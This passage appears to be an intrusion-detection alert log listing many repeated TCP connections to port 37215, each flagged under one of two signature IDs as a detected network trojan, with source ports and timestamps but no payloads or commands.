          SID:2835222
          Source Port:51388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.166308
          SID:2835222
          Source Port:54802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645508
          SID:2835222
          Source Port:48730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.033909
          SID:2829579
          Source Port:47396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.476839
          SID:2829579
          Source Port:36856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.916354
          SID:2829579
          Source Port:58602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396720
          SID:2835222
          Source Port:46752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926210
          SID:2835222
          Source Port:51306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.209050
          SID:2835222
          Source Port:43168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.567648
          SID:2829579
          Source Port:37428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412006
          SID:2835222
          Source Port:55640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539110
          SID:2835222
          Source Port:47130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928080
          SID:2835222
          Source Port:41302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.032547
          SID:2835222
          Source Port:45954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944770
          SID:2829579
          Source Port:48232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102662
          SID:2829579
          Source Port:56496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.862083
          SID:2829579
          Source Port:44518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418694
          SID:2835222
          Source Port:45142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168189
          SID:2835222
          Source Port:35408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162883
          SID:2835222
          Source Port:59778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.692150
          SID:2829579
          Source Port:55752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928910
          SID:2835222
          Source Port:60652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948551
          SID:2835222
          Source Port:37348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396515
          SID:2829579
          Source Port:41876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.400141
          SID:2829579
          Source Port:53608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.209019
          SID:2835222
          Source Port:60478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.010784
          SID:2835222
          Source Port:51176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923657
          SID:2829579
          Source Port:33810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.720049
          SID:2835222
          Source Port:41948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.291152
          SID:2835222
          Source Port:53166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.037931
          SID:2835222
          Source Port:50494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.559661
          SID:2835222
          Source Port:39818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.287884
          SID:2829579
          Source Port:32780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.471811
          SID:2835222
          Source Port:37998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287035
          SID:2835222
          Source Port:50632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.905975
          SID:2829579
          Source Port:49468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.167449
          SID:2835222
          Source Port:51214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.293947
          SID:2829579
          Source Port:59510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.557206
          SID:2829579
          Source Port:51860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721428
          SID:2829579
          Source Port:50254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288645
          SID:2829579
          Source Port:42690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.313982
          SID:2829579
          Source Port:50432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645380
          SID:2829579
          Source Port:60780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412068
          SID:2835222
          Source Port:54620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.073734
          SID:2835222
          Source Port:34630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034792
          SID:2829579
          Source Port:49058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.478826
          SID:2835222
          Source Port:46638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.285458
          SID:2829579
          Source Port:56226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.996308
          SID:2829579
          Source Port:47570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.037149
          SID:2829579
          Source Port:43080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.633948
          SID:2829579
          Source Port:42268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.273680
          SID:2835222
          Source Port:47404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.860453
          SID:2829579
          Source Port:47362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.600280
          SID:2829579
          Source Port:37112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.894532
          SID:2829579
          Source Port:33536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.559719
          SID:2829579
          Source Port:45058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.242392
          SID:2835222
          Source Port:49604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.418234
          SID:2835222
          Source Port:50980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038686
          SID:2829579
          Source Port:36540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645351
          SID:2835222
          Source Port:38208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396305
          SID:2829579
          Source Port:56546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869222
          SID:2835222
          Source Port:52202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.294883
          SID:2829579
          Source Port:43734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.012578
          SID:2829579
          Source Port:52888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944791
          SID:2829579
          Source Port:52686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.296751
          SID:2835222
          Source Port:50934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.465489
          SID:2835222
          Source Port:44128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.477343
          SID:2835222
          Source Port:41992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.160933
          SID:2835222
          Source Port:50802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.567460
          SID:2829579
          Source Port:59768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399745
          SID:2829579
          Source Port:40128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289171
          SID:2829579
          Source Port:40624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248327
          SID:2835222
          Source Port:56168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946254
          SID:2835222
          Source Port:44728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078017
          SID:2835222
          Source Port:36256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820308
          SID:2835222
          Source Port:53116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.951646
          SID:2835222
          Source Port:44844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.089565
          SID:2829579
          Source Port:36424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205704
          SID:2835222
          Source Port:54598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.989936
          SID:2835222
          Source Port:50234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.241954
          SID:2829579
          Source Port:47192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718974
          SID:2829579
          Source Port:45838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104351
          SID:2835222
          Source Port:50482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289846
          SID:2829579
          Source Port:51806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947358
          SID:2835222
          Source Port:50242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.918889
          SID:2835222
          Source Port:52088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.014409
          SID:2835222
          Source Port:37588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.668666
          SID:2829579
          Source Port:50754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165304
          SID:2829579
          Source Port:56926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.166250
          SID:2835222
          Source Port:47836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720377
          SID:2835222
          Source Port:40118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.088845
          SID:2835222
          Source Port:49982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.984204
          SID:2835222
          Source Port:45708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289734
          SID:2835222
          Source Port:50516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168938
          SID:2829579
          Source Port:50616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.678237
          SID:2829579
          Source Port:45698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164857
          SID:2829579
          Source Port:47612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.990542
          SID:2829579
          Source Port:57326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.594909
          SID:2829579
          Source Port:49956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414718
          SID:2835222
          Source Port:34826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.357475
          SID:2835222
          Source Port:51226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.477966
          SID:2835222
          Source Port:44754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.167044
          SID:2829579
          Source Port:56054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227049
          SID:2835222
          Source Port:48052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.292730
          SID:2835222
          Source Port:48636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.540112
          SID:2829579
          Source Port:49474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.540383
          SID:2829579
          Source Port:42398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.720137
          SID:2835222
          Source Port:46400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.989690
          SID:2835222
          Source Port:56228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929844
          SID:2835222
          Source Port:52274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.922986
          SID:2829579
          Source Port:52394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287274
          SID:2835222
          Source Port:46836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720344
          SID:2829579
          Source Port:38662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945309
          SID:2829579
          Source Port:41300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.120653
          SID:2835222
          Source Port:40458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.930216
          SID:2835222
          Source Port:55696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719489
          SID:2835222
          Source Port:60470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081758
          SID:2835222
          Source Port:52994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720395
          SID:2829579
          Source Port:48680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.268390
          SID:2829579
          Source Port:52558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821435
          SID:2829579
          Source Port:34036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.870525
          SID:2829579
          Source Port:33908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168748
          SID:2835222
          Source Port:59108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028754
          SID:2829579
          Source Port:58252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.740967
          SID:2829579
          Source Port:50538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.277367
          SID:2829579
          Source Port:47072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.475915
          SID:2829579
          Source Port:57694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.990119
          SID:2829579
          Source Port:42352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.274521
          SID:2829579
          Source Port:51158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944624
          SID:2835222
          Source Port:56264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.863309
          SID:2835222
          Source Port:53724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.098262
          SID:2829579
          Source Port:39604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.902068
          SID:2835222
          Source Port:60460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.285747
          SID:2835222
          Source Port:49824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.288195
          SID:2835222
          Source Port:52432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.161369
          SID:2829579
          Source Port:36122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.241815
          SID:2835222
          Source Port:48332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720551
          SID:2835222
          Source Port:58992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398494
          SID:2835222
          Source Port:42904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.606714
          SID:2835222
          Source Port:58948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.029855
          SID:2829579
          Source Port:35920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034163
          SID:2829579
          Source Port:58410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.905310
          SID:2835222
          Source Port:41060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.295306
          SID:2829579
          Source Port:40558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.917856
          SID:2835222
          Source Port:40032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823462
          SID:2835222
          Source Port:33116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720189
          SID:2835222
          Source Port:45962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.088208
          SID:2829579
          Source Port:41046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.895670
          SID:2829579
          Source Port:54308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.671587
          SID:2829579
          Source Port:35326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.571492
          SID:2829579
          Source Port:44406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399410
          SID:2835222
          Source Port:37074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227745
          SID:2835222
          Source Port:50050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715431
          SID:2835222
          Source Port:43032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.952019
          SID:2835222
          Source Port:40734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718743
          SID:2835222
          Source Port:34928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223528
          SID:2835222
          Source Port:53084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.418349
          SID:2835222
          Source Port:42778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.595584
          SID:2835222
          Source Port:45112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714970
          SID:2829579
          Source Port:44446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288503
          SID:2829579
          Source Port:54718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818206
          SID:2835222
          Source Port:37552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206314
          SID:2829579
          Source Port:38486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.158314
          SID:2835222
          Source Port:47970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.079265
          SID:2835222
          Source Port:47994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.274938
          SID:2829579
          Source Port:47506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539370
          SID:2835222
          Source Port:37488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.288310
          SID:2829579
          Source Port:39734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081852
          SID:2835222
          Source Port:47122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.599252
          SID:2835222
          Source Port:46668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.596161
          SID:2829579
          Source Port:43204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.891021
          SID:2829579
          Source Port:39490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.252247
          SID:2835222
          Source Port:44022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.560308
          SID:2835222
          Source Port:56462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.563117
          SID:2829579
          Source Port:41986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947871
          SID:2835222
          Source Port:48952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822729
          SID:2829579
          Source Port:36452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719387
          SID:2835222
          Source Port:49488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720630
          SID:2829579
          Source Port:51494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.271976
          SID:2835222
          Source Port:49384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.540171
          SID:2835222
          Source Port:55584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.302747
          SID:2835222
          Source Port:37840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.466855
          SID:2829579
          Source Port:35506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033872
          SID:2835222
          Source Port:59682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.563444
          SID:2829579
          Source Port:34022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.471543
          SID:2829579
          Source Port:46122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821741
          SID:2835222
          Source Port:33790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865767
          SID:2829579
          Source Port:49606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284312
          SID:2835222
          Source Port:44160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081030
          SID:2835222
          Source Port:51830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205366
          SID:2829579
          Source Port:38484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.030869
          SID:2829579
          Source Port:52906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721100
          SID:2829579
          Source Port:40220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472364
          SID:2835222
          Source Port:51722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230622
          SID:2835222
          Source Port:41420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.301172
          SID:2829579
          Source Port:46702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822643
          SID:2829579
          Source Port:56558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.921186
          SID:2835222
          Source Port:40650
          Destination Port:37215
